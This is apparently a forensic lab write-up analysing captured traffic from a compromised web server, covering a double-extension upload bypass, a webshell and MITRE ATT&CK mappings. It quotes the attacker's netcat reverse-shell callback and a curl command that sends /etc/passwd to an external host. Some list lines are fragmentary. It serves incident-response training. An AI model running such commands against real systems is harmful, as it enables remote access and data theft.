A suspicious file was identified on a company web server, raising concerns of potential compromise. The network team captured traffic and provided a PCAP file (355 packets) for analysis.
Objective:
Opened the PCAP in Wireshark. Statistics → Endpoints revealed two communicating IP addresses:
117.11.88.124 (External)24.46.63.79 (Web Server)The limited packet count (355 packets) suggested a focused intrusion rather than large-scale scanning.

117.11.88.124 resolved to:
This indicates the attack originated externally.


Filtering for HTTP traffic:
http
Following HTTP streams revealed the attacker’s User-Agent:
Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
While this appears legitimate, User-Agent strings can be spoofed. This value could be used in detection rules for threat hunting.


Filtering for POST requests:
http.request.method == "POST"
Identified a suspicious file upload:
filename="image.jpg.php"
This suggests a file upload validation weakness, allowing a double-extension bypass (image.jpg.php), resulting in remote code execution capability.

Upload path:
/reviews/uploads/
This confirms the web application allowed executable file uploads.


Inspection of the uploaded file revealed a webshell containing:
nc 117.11.88.124 8080
The attacker attempted to establish outbound communication to 117.11.88.124:8080. This indicates the server permitted unrestricted outbound traffic, enabling reverse shell callback. This is consistent with reverse shell behaviour.




Further HTTP stream analysis revealed:
curl -X POST -d /etc/passwd http://117.11.88.124:443
The attacker attempted to exfiltrate /etc/passwd. This confirms post-exploitation activity and attempted credential harvesting.


image.jpg.php)/etc/passwd via HTTP POST
| Purpose | Filter |
|---|---|
| Isolate HTTP traffic | http |
| File upload activity | http.request.method == "POST" |
| Isolate attacker IP | ip.addr == 117.11.88.124 |
| Reverse shell traffic | tcp.port == 8080 |
| Isolate TCP stream | tcp.stream eq X |
Follow specific TCP stream: Right-click packet → Follow → HTTP Stream
| Technique | ID |
|---|---|
| Exploit Public-Facing Application | T1190 |
| Web Shell | T1505.003 |
| Command Execution | T1059 |
| Exfiltration Over C2 Channel | T1041 |
| Application Layer Protocol | T1071 |
.jpg.php, .png.php etc.)/uploads/ directories